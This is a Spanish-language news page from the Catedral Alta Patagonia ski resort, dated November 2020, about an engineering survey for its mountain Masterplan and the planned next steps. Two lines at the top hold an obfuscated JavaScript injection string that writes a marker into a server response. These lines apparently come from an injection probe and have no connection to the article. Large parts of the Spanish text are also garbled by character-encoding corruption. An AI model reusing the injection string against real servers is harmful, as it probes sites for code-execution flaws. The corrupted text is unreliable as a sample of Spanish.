arguments[1].end(String.fromCharCode(0x66).concat(String.fromCharCode(0x41),String.fromCharCode(0x61),String.fromCharCode(0x53),String.fromCharCode(0x74),String.fromCharCode(81)))   

   arguments[1].end(String.fromCharCode(0x66).concat(String.fromCharCode(0x41),String.fromCharCode(0x61),String.fromCharCode(0x53),String.fromCharCode(0x74),String.fromCharCode(81)))   

Imagen de noticia

24 de Noviembre de 2020

T√©cnicos especializados de Ingenier√≠a B√°sica llegaron a Catedral para realizar un relevamiento de la monta√Īa para el Masterplan

Del 16 al 20 de noviembre se reunieron en Catedral especialistas técnicos de Ingeniería Básica para relevar todos los sectores donde se desarrollará el Masterplan de Catedral. Se recorrió la zona de conexión, línea princesa, las obras de pistas en el tercio medio y la nueva pista cascada, se evaluaron la topografía, caminos de acceso, las posibles interferencias y soluciones técnicas que se pueden proponer para la elaboración de la ingeniería de detalle. Esta instancia fue fundamental para avanzar con la ingeniería básica que se espera presentar en el mes de diciembre.

De las jornadas participaron el Ingeniero Civil, Luis Scaglia y el residente barilochense Hernando Lara, Ingeniero Electromecánico; por parte de Catedral participaron Helgamaria Salvatelli, Responsable General; Víctor Farías, Coordinador del proyecto Masterplan; Francisco Bruzone Ingeriría Masterplan; Matías Marcaccini, Responsable de Pistas e Innivación; Santiago Lennon, Responsable de Seguridad, entre otros.

Luis Scaglia, Ingeniero consultor indic√≥ ‚ÄúEs importante volver a estar ac√°, cada vez que venimos ajustamos el ojo para tener cada vez m√°s informaci√≥n y detalles del terreno, haber recorrido todas estas zonas en particular ayuda mucho. Ver en terreno lo que nosotros vemos en planos o lo que hablamos y sabemos, ayuda a minimizar imprevistos a m√°ximo. En cuanto a los pr√≥ximos pasos, ahora vamos a procesar todos los planos para armar el anteproyecto de la ingenier√≠a b√°sica que esperamos presentar en diciembre. Luego, el siguiente paso, es a partir de la ingenier√≠a b√°sica armar el proyecto ejecutivo, la ingeniera de detalle, que es lo que va a dar la definici√≥n final para empezar la obra‚ÄĚ.

‚ÄúDurante la etapa de ingenier√≠a B√°sica se definen los alcances t√©cnicos del proyecto, por eso es importante que durante esta etapa se realice un relevamiento in situ de las obras a realizar. Permite tener un mejor entendimiento de las dificultades y desaf√≠os que se pueden presentar en el dise√Īo de las instalaciones y lograr una ingenier√≠a m√°s consolidada. Por eso la visita del equipo t√©cnico es muy provechosa a la hora de pensar al proyecto como un conjunto interconectado y no muchos subproyectos independientes.‚ÄĚ dijo Francisco Bruzone, Ingeniero de Catedral Alta Patagonia.

Esta visita, que se vio demorada por las restricciones de circulación por la pandemia mundial COVID-19, es un paso importante para el desarrollo del Masterplan de Catedral. Se espera en diciembre presentar el anteproyecto para avanzar con la Ingeniería de Detalle, estudios y obras.

¬ŅQu√© es ingeniera b√°sica e ingeniera en detalle?
La Ingeniería Básica tiene por objetivo desarrollar un plan de ejecución del proyecto. Durante esta fase se fija el alcance del proyecto; se establecen las capacidades y las características de los productos y servicios que genera el proyecto; se definen los aspectos relacionados con medioambiente, donde se solicitarán los términos de referencia en los cuales se deberán enmarcar los Estudios de Impacto Ambiental; se definen aspectos de seguridad y la selección de materiales. Se establecen, además, las especificaciones detalladas que van a seguirse en las fases siguientes.

La Ingeniería de Detalle completa el desarrollo de toda la ingeniería del proyecto al nivel de detalle constructivo. Durante esta etapa se definen los materiales, conjuntos prefabricados y equipos; los métodos constructivos, criterios de aceptabilidad, pruebas, ensayos de las instalaciones a construir, los aspectos geométricos y dimensionales necesarios para la fabricación de los componentes del proyecto, entre otros.


Próximos pasos en el Masterplan hasta diciembre 2020:

  • Se avanza con el estudio de Ingenier√≠a B√°sica y el estudio de los medios de elevaci√≥n, entre otros.

  • Se est√° definiendo la campa√Īa de estudios de suelo, es decir, que tipos de estudio, d√≥nde, etc, con PRO ALPE Integrated Design, POMA y la Consultora de Ingenier√≠a.

  • Se avanza con las cartas de cr√©dito para la adquisici√≥n de 2 equipos OBELL`X con TAS, l√≠der en sistemas de control y gesti√≥n de riesgos de avalanchas.

  • Se est√° cotizando con diferentes proveedores el relevamiento topogr√°fico de precisi√≥n de la monta√Īa que se realizar√° en el mes de enero, para luego continuar con los estudios en detalle.


Volver a ver todas las Novedades >

Fips
Fips
Fips
Fips

© 2020 - Catedral Alta Patagonia - Todos los derechos reservados.